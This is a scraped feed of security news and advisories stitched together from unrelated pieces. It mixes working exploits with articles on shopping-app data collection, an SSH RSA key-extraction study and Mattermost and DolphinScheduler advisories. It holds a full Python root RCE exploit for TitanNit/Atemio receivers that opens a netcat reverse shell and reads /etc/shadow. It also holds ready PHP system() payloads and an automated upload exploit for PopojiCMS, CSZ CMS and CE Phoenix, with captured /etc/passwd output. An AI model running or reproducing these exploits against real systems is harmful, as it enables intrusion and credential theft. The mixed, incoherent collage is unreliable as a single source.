Stack Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the devName parameter in the function formAddMacfilterRule.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-49046: IOT_VULN/Tenda/AX1803/formAddMacfilterRule.md at main · Anza2001/IOT_VULN

The Atemio AM 520 HD Full HD satellite receiver has a vulnerability that enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the getcommand query within the application, allowing the attacker to gain root access. Firmware versions 2.01 and below are affected.

    #!/usr/bin/env python# -*- coding: utf-8 -*-### TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution### Vendor: AAF Digital HD Forum | Atelmo GmbH# Product web page: http://www.aaf-digital.info | https://www.atemio.de# Affected version: Firmware <=2.01## Summary: The Atemio AM 520 HD Full HD satellite receiver enables the# reception of digital satellite programs in overwhelming image quality# in both SD and HD ranges. In addition to numerous connections, the small# all-rounder offers a variety of plugins that can be easily installed# thanks to the large flash memory. The TitanNit Linux software used combines# the advantages of the existing E2 and Neutrino systems and is therefore# fast, stable and adaptable.## Desc: The vulnerability in the device enables an unauthorized attacker# to execute system commands with elevated privileges. This exploit is# facilitated through the use of the 'getcommand' query within the application,# allowing the attacker to gain root access.## ========================================================================# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999# [*] Starting callback listener child thread# [*] Listening on port 9999# [*] Generating callback payload# [*] Calling# [*] Callback waiting: 3s# [*] ('192.168.1.13', 40943) called back# [*] Rootshell session opened# sh: cannot set terminal process group (1134): Inappropriate ioctl for device# sh: no job control in this shell# sh-5.1# id# <-sh-5.1# id# uid=0(root) gid=0(root)# sh-5.1# cat /etc/shadow | grep root# <-sh-5.1# cat /etc/shadow | grep root# root:$6$TAdBGj2mY***:18729:0:99999:7:::# sh-5.1# exit# [*] OK, bye!## _# # =======================================================================## Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)#            GNU/Linux 3.14-1.17 (armv7l)#            GNU/Linux 3.14.2 (mips)#            ATEMIO M46506 revision 990#            Atemio 7600 HD STB#            CPU STx7105 Mboard#            titan web server### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5801# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php### 16.11.2023#from time import sleepimport threadingimport requestsimport socketimport sysclass RemoteControl:    def __init__(self):        self.timeout = 10        self.target = None        self.callback = None        self.cstop = threading.Event()        self.path = "/query?getcommand=&cmd="        self.lport = None        self.cmd = None    def beacon(self):        self.cmd   = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "        self.cmd  += self.callback + " "        self.cmd  += str(self.lport) + " "        self.cmd  += ">/tmp/j"        self.path += self.cmd        r = requests.get(self.target + self.path)    def slusaj(self):        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.bind(("0.0.0.0", self.lport))        s.listen(1)        print("[*] Listening on port " + str(self.lport))        sleep(1)        try:            conn, addr = s.accept()            print("\n[*]", addr, "called back")            print("[*] Rootshell session opened")            self.cstop.set()        except socket.timeout:            print("[-] Call return timeout\n[!] Check your ports")            conn.close()        while True:            try:                odg = conn.recv(999999).decode()                sys.stdout.write(odg)                command = input()                command += "\n"                if "exit" in command:                    exit(-17)                conn.send(command.encode())                sleep(0.5)                sys.stdout.write("<-" + odg.split("\n")[-1])            except:                print("[*] OK, bye!")                exit(-1)        s.close()    def tajmer(self):        for z in range(self.timeout, 0, -1):            poraka = f"[*] Callback waiting: {z}s"            print(poraka, end='', flush=True)            sys.stdout.flush()            sleep(1)            if self.cstop.is_set():                break            print(' ' * len(poraka), end='\r')        if not self.cstop.is_set():            print("[-] Call return timeout\n[!] Check your ports")            exit(0)        else:            print(end=' ')    def thricer(self):        print("[*] Starting callback listener child thread")        plet1 = threading.Thread(name="ZSL", target=self.slusaj)        plet1.start()        sleep(1)        print("[*] Generating callback payload")        sleep(1)        print("[*] Calling")        plet2 = threading.Thread(name="ZSL", target=self.tajmer)        plet2.start()        self.beacon()        plet1.join()        plet2.join()    def howto(self):        if len(sys.argv) != 4:            self.usage()        else:            self.target = sys.argv[1]            self.callback = sys.argv[2]            self.lport = int(sys.argv[3])            if not self.target.startswith("http"):                self.target = "http://{}".format(self.target)    def dostabesemolk(self):        naslov = """    o===--------------------------------------===o    |                                            |    | TitanNit Web Control Remote Code Execution |    |                ZSL-2023-5801               |    |                                            |    o===--------------------------------------===o                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          L!                         /_)                        / /L_______________________/ (__)_______________________  (__)                       \_(__)                          ||                          ||                          ||                          ||                          ||                          ||        """        print(naslov)    def usage(self):        self.dostabesemolk()        print("Usage: ./titan.py <target ip> <listen ip> <listen port>")        print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")        exit(0)    def main(self):        self.howto()        self.thricer()if __name__ == '__main__':    RemoteControl().main()

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

PopojiCMS version 2.0.1 suffers from a remote command execution vulnerability.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

PopojiCMS 2.0.1 Remote Command Execution

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

CSZ CMS 1.3.0 Remote Command Execution

CE Phoenix version 1.0.8.20 suffers from an authenticated remote command execution vulnerability.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)### POC:<img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000">1. **Login to admin panel:**     - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english`    2. **Access english.php:**    - Click on `english.php` and inject the payload:     ```    <?php echo system('cat /etc/passwd'); ?>    ```    3. **Save Changes:**    - Save the modified file.4. **View Results:**    - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/`    - You will see the following result:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinsystemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologinsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpolkitd:x:998:997:User for polkitd:/:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinchrony:x:997:995::/var/lib/chrony:/sbin/nologinsoft:x:1000:1000::/home/soft:/sbin/nologinsaslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinemps:x:995:1001::/home/emps:/bin/bashnamed:x:25:25:Named:/var/named:/sbin/nologinexim:x:93:93::/var/spool/exim:/sbin/nologinvmail:x:5000:5000::/var/local/vmail:/bin/bashmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/falsewebuzo:x:993:993::/home/webuzo:/bin/bashapache:x:992:991::/home/apache:/sbin/nologinapache:x:992:991::/home/apache:/sbin/nologin

CE Phoenix 1.0.8.20 Remote Command Execution

By Deeba Ahmed
Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined.
This is a post from HackRead.com Read the original post: Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

As per Atlas VPN’s research, besides Amazon, eBay, and Afterpay, other popular apps were also found to be sharing personal details and financial data with third parties.

To shop for Black Friday and Cyber Monday, most users turn to smartphones and tablets to secure the best deals. However, it is essential to be aware of potential risks, such as how various vendors collect your data, to navigate the shopping season safely.

According to the latest research conducted by the Atlas VPN team, numerous leading online shopping platforms collect sensitive user data, with some going as far as sharing this **information with third parties** without the users’ knowledge.

The platforms underwent assessment across various data collection categories, encompassing personal details, financial information, and user geolocation. The evaluated data points included the user’s name, phone number, payment method, and precise location, which were further categorized into extended data types for more in-depth analysis.

In addition, Atlas VPN researchers assessed the Google Play app profiles of the 60 most popular Android apps within the shopping category. The apps were ranked according to the number of user information data points collected.

The researchers chose apps from App Figures’ top Android shopping app charts for 2023 for their analysis. The charts comprised various apps, including shopping, buy now and pay later, and discount offer apps. Researchers have shared their list of the year’s top 15 highest-user data-collecting apps.

According to their **report**, Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined. Reportedly, eBay collects 28 user data points, and Amazon collects 25.

The popular buy-now app Afterpay was the third-highest data collecting platform with 22 data points against 7 data types. It was the only identified app that didn’t just collect data but also shared sensitive data such as in-app messages, emails, SMS messages, and credit scores with third parties.

Next were Home Improvement retailer Lowe’s health retail platform iHerb and Vinted, a secondhand products marketplace. Each collected 21 data points. Chinese e-comm website Alibaba and home goods giant Home Depot collected 20 data points across 9 data types. Poshmark, another secondhand goods retailer, collected significant user data with 19 data points in 7 categories.

The rest of the apps included Nike, Wayfair, OfferUp, Craigslist, ASOS, and H&M apps, each collecting 18 data points. Among the 60 apps examined by Atlas VPN, Kohl’s app didn’t collect any data. A staggering 75% of the apps share user data with third parties. For instance, 52% and 38% of apps shared app activity, app info, and performance data, typically used to enhance user experience. 

Moreover, 58% of the apps shared personal data like names, home addresses, email IDs, and phone numbers with third parties. A whopping 25% of these apps shared device IDs or other unique identifiers for smartphones and tablets.

Around one-third, or 37%, of the apps disclosed financial data, including purchase history and payment details, whereas 28% shared location data with external sources. The extent of data sharing among Android shopping apps is alarming and a threat to user privacy.

Cybersecurity writer at Atlas VPN, Vilius Kardelis, shared his thoughts on shopping app data collection with Hackread.com, stating that:

“In today’s digital age, your personal information is being extensively collected by apps and shared with countless firms. This holiday season, approach all apps aware your data is being collected. Take the time to carefully read privacy policies, be mindful of the permissions you grant, and prioritize safe shopping practices to safeguard your personal information.”

****Surprised? Don’t be!****

Smartphone apps are designed to collect user data, and the extent and duration of this collection are subjects of debate. Contrarily, data collection and sharing constitute a lucrative business for technology giants.

**In 2021,** researchers claimed that Android sends more data to Google than iOS does to Apple. The research suggested that Android devices collect and transmit twice as much data to Google compared to iOS to Apple. However, Google refuted these findings.

In August of last year, researchers compiled a list of the 10 Android Educational Apps that collect the most user data. The list, **available here**, includes some of the most prominent and widely used Android apps globally.

****Conclusion:****

There isn’t much one can do to prevent apps from collecting data. However, if you are an Android user, consider downloading apps only after reviewing the section on the Play Store that details the data the app collects.

1.  **Fake GitHub Repos Delivering Malware as PoCs**
2.  **Google kicks out 600 malicious apps from Play Store**
3.  **Apple removed all major VPN apps from Chinese App Store**
4.  **Google removes ClearURLs Chrome extension from its store**
5.  **Google Fails To Remove “App Developer” Behind Malware Scam**

Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

A new study has demonstrated that it's possible for passive network attackers to obtain private RSA host keys from a vulnerable SSH server by observing when naturally occurring computational faults that occur while the connection is being established.
The Secure Shell (SSH) protocol is a method for securely transmitting commands and logging in to a computer over an unsecured network. Based on a

Server Security / Encryption

A new study has demonstrated that it's possible for passive network attackers to obtain private RSA host keys from a vulnerable SSH server by observing when naturally occurring computational faults that occur while the connection is being established.

The Secure Shell (SSH) protocol is a method for securely transmitting commands and logging in to a computer over an unsecured network. Based on a client-server architecture, SSH uses cryptography to authenticate and encrypt connections between devices.

A host key is a cryptographic key used for authenticating computers in the SSH protocol. Host keys are key pairs that are typically generated using public-key cryptosystems like RSA.

"If a signing implementation using CRT-RSA has a fault during signature computation, an attacker who observes this signature may be able to compute the signer's private key," a group of academics from the University of California, San Diego, and Massachusetts Institute of Technology said in a paper this month.

In other words, a passive adversary can quietly keep track of legitimate connections without risking detection until they observe a faulty signature that exposes the private key. The bad actor can then masquerade as the compromised host to intercept sensitive data and stage adversary-in-the-middle (AitM) attacks.

The researchers described the method as a lattice-based key recovery fault attack, which allowed them to retrieve the private keys corresponding to 189 unique RSA public keys that were subsequently traced to devices from four manufacturers: Cisco, Hillstone Networks, Mocana, and Zyxel.

It's worth noting that the release of TLS version 1.3 in 2018 acts as a countermeasure by encrypting the handshake that establishes the connection, thus preventing passive eavesdroppers from accessing the signatures.

"These attacks provide a concrete illustration of the value of several design principles in cryptography: encrypting protocol handshakes as soon as a session key is negotiated to protect metadata, binding authentication to a session, and separating authentication from encryption keys," the researchers said.

The findings come two months after the disclosure of Marvin Attack, a variant of the ROBOT (short for "Return Of Bleichenbacher's Oracle Threat") Attack which allows a threat actor to decrypt RSA ciphertexts and forge signatures by exploiting security weaknesses in PKCS #1 v1.5.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Passive Method to Extract Private RSA Keys from SSH Connections

Mattermost fails to perform proper authorization in the `/plugins/focalboard/api/v2/users` endpoint allowing an attacker who is a guest user and knows the ID of another user to get their information (e.g. name, surname, nickname) via Mattermost Boards.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-6202

**Mattermost Improper Access Control vulnerability**

Moderate severity GitHub Reviewed Published Nov 27, 2023 to the GitHub Advisory Database • Updated Nov 28, 2023

**Package**

gomod github.com/mattermost/mattermost-server/v6 (Go)

**Affected versions**

< 7.8.13

gomod github.com/mattermost/mattermost/server/v8 (Go)

\>= 9.1.0, < 9.1.1

\>= 9.0.0, < 9.0.2

< 8.1.4

**Description**

Published to the GitHub Advisory Database

Nov 27, 2023

Last updated

Nov 28, 2023

GHSA-85jj-c9jr-9jhx: Mattermost Improper Access Control vulnerability

Mattermost fails to limit the log size of server logs allowing an attacker sending specially crafted requests to different endpoints to potentially overflow the log. 



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-48369

**Mattermost Uncontrolled Resource Consumption vulnerability**

Moderate severity GitHub Reviewed Published Nov 27, 2023 to the GitHub Advisory Database • Updated Nov 28, 2023

**Package**

gomod github.com/mattermost/mattermost-server/v6 (Go)

**Affected versions**

< 7.8.13

gomod github.com/mattermost/mattermost/server/v8 (Go)

\>= 9.1.0, < 9.1.1

\>= 9.0.0, < 9.0.2

< 8.1.4

**Description**

Published to the GitHub Advisory Database

Nov 27, 2023

Last updated

Nov 28, 2023

GHSA-3487-3j7c-7gwj: Mattermost Uncontrolled Resource Consumption vulnerability

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler. This issue affects Apache DolphinScheduler: before 3.2.1.

Users are recommended to upgrade to version 3.2.1, which fixes the issue. At the time of disclosure of this advisory, this version has not yet been released. In the mean time, we recommend you make sure the logs are only available to trusted operators.



**Apache DolphinScheduler Exposure of Sensitive Information to an Unauthorized Actor vulnerability**

Moderate severity GitHub Reviewed Published Nov 27, 2023 to the GitHub Advisory Database • Updated Nov 28, 2023

Tag

#git